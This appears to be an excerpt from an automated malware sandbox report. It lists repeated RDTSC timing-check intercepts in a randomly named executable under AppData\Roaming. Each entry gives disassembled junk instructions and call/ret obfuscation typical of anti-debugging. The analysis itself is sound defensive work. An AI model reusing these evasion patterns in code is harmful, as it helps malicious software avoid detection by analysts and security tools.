Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DC64D second address: 4DC651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DC651 second address: 4DC657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DC657 second address: 4DC65C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DC65C second address: 4DC662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DD4A9 second address: 4DD4CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d jmp 00007F2738E98EECh 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DE4CB second address: 4DE4D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DE4D5 second address: 4DE4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4DE4D9 second address: 4DE577 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2738B89E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F2738B89E08h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov edi, 1C14265Eh 0x0000002d mov dword ptr [ebp+122D261Ch], ecx 0x00000033 push dword ptr fs:[00000000h] 0x0000003a push esi 0x0000003b mov dword ptr [ebp+122D586Ch], ebx 0x00000041 pop ebx 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 mov dword ptr [ebp+1246A2EBh], edx 0x0000004f mov eax, dword ptr [ebp+122D031Dh] 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007F2738B89E08h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f mov bh, dh 0x00000071 push FFFFFFFFh 0x00000073 cmc 0x00000074 nop 0x00000075 jmp 00007F2738B89E16h 0x0000007a push eax 0x0000007b push ecx 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4E9281 second address: 4E9299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEAh 0x00000007 jbe 00007F2738E98EE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4E9422 second address: 4E9426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4EDE5A second address: 4EDEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738E98EF9h 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jno 00007F2738E98EF4h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007F2738E98EECh 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007F2738E98EE6h 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4EDF4A second address: 4EDF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4EDF4E second address: 4EDF90 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F2738E98F05h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007F2738E98EE6h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4F39A0 second address: 4F39A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4F39A5 second address: 4F39B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007F2738E98EE6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4F3B37 second address: 4F3B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4F3B3B second address: 4F3B48 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4F3B48 second address: 4F3B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E0Eh 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4F4229 second address: 4F4247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F2738E98EF9h 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4F4247 second address: 4F424F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4F424F second address: 4F425C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4FB58F second address: 4FB593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4FB593 second address: 4FB597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4FB597 second address: 4FB5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F2738B89E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4FB9B2 second address: 4FB9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4FB9B6 second address: 4FB9CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F2738B89E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F2738B89E0Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4FC03B second address: 4FC042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4FC18B second address: 4FC191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4FC191 second address: 4FC197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4AA02D second address: 4AA04D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Ah 0x00000007 jnl 00007F2738B89E0Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4AA04D second address: 4AA06D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2738E98EF9h 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48030D second address: 480329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E18h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4FFC8A second address: 4FFC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6117 second address: 4A95B0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2738B89E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jmp 00007F2738B89E14h 0x00000011 nop 0x00000012 mov cx, 3159h 0x00000016 call dword ptr [ebp+122D2BD0h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C67B4 second address: 4C67DC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], esi 0x0000000e jnl 00007F2738E98EE7h 0x00000014 nop 0x00000015 jmp 00007F2738E98EECh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C67DC second address: 4C67EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E0Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6A78 second address: 4C6AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738E98EEEh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1CFFh], edx 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F2738E98EE8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f xor cl, 00000051h 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push ecx 0x00000036 pushad 0x00000037 popad 0x00000038 pop ecx 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6DDA second address: 4C6DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6DDE second address: 4C6E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, dword ptr [ebp+122D393Bh] 0x00000010 push 0000001Eh 0x00000012 sub dword ptr [ebp+122D2E09h], edi 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007F2738E98EF2h 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6E0B second address: 4C6E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6EE3 second address: 4C6EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2738E98EECh 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6EFA second address: 4C6F0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6F0B second address: 4C6F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F2738E98EE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6F15 second address: 4C6F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5001E4 second address: 5001E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 500319 second address: 50032E instructions: 0x00000000 rdtsc 0x00000002 je 00007F2738B89E06h 0x00000008 jbe 00007F2738B89E06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5007AE second address: 5007B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2738E98EE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 50091B second address: 50093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2738B89E15h 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F2738B89E06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 504D87 second address: 504D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 504D8D second address: 504DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2738B89E06h 0x0000000a popad 0x0000000b jng 00007F2738B89E0Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 504EB8 second address: 504EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 505498 second address: 5054BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2738B89E11h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 504A35 second address: 504A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 504A39 second address: 504A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 jmp 00007F2738B89E12h 0x0000000d je 00007F2738B89E06h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 jo 00007F2738B89E1Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 505CEB second address: 505CF7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2738E98EE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 505CF7 second address: 505D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2738B89E06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 505D03 second address: 505D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 505D07 second address: 505D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 505D0B second address: 505D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F2738E98EE6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 505D1B second address: 505D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 481DCA second address: 481DCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 481DCE second address: 481DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F2738B89E06h 0x00000010 jmp 00007F2738B89E0Eh 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 50C350 second address: 50C380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738E98EF8h 0x00000009 jmp 00007F2738E98EF4h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 50C4F5 second address: 50C4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 50C4F9 second address: 50C4FF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 50F54A second address: 50F552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 50EEEB second address: 50EEF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F2738E98EE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 50EEF6 second address: 50EEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 50EEFC second address: 50EF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jnl 00007F2738E98EE6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F2738E98EF7h 0x0000001b pushad 0x0000001c popad 0x0000001d push esi 0x0000001e pop esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51254E second address: 512560 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2738B89E08h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F2738B89E06h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 515FF4 second address: 515FFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 515FFA second address: 516004 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2738B89E0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5157F9 second address: 5157FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5157FE second address: 51581B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2738B89E16h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 519FCF second address: 519FED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2738E98EE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2738E98EEEh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51A276 second address: 51A290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F2738B89E06h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F2738B89E06h 0x00000014 jc 00007F2738B89E06h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6C21 second address: 4C6C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6C28 second address: 4C6CED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2738B89E08h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F2738B89E12h 0x00000012 nop 0x00000013 mov cx, di 0x00000016 mov ebx, dword ptr [ebp+1248AE60h] 0x0000001c clc 0x0000001d add eax, ebx 0x0000001f call 00007F2738B89E0Ah 0x00000024 mov edi, 3903AA21h 0x00000029 pop ecx 0x0000002a nop 0x0000002b jnl 00007F2738B89E1Eh 0x00000031 push eax 0x00000032 jmp 00007F2738B89E12h 0x00000037 nop 0x00000038 push 00000004h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007F2738B89E08h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D27C7h], ebx 0x0000005a nop 0x0000005b jng 00007F2738B89E1Dh 0x00000061 push edx 0x00000062 jmp 00007F2738B89E15h 0x00000067 pop edx 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push edx 0x0000006c je 00007F2738B89E06h 0x00000072 pop edx 0x00000073 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6CED second address: 4C6CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2738E98EE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51A6D0 second address: 51A6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51A6D4 second address: 51A6DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51A6DA second address: 51A6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D969 second address: 51D96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
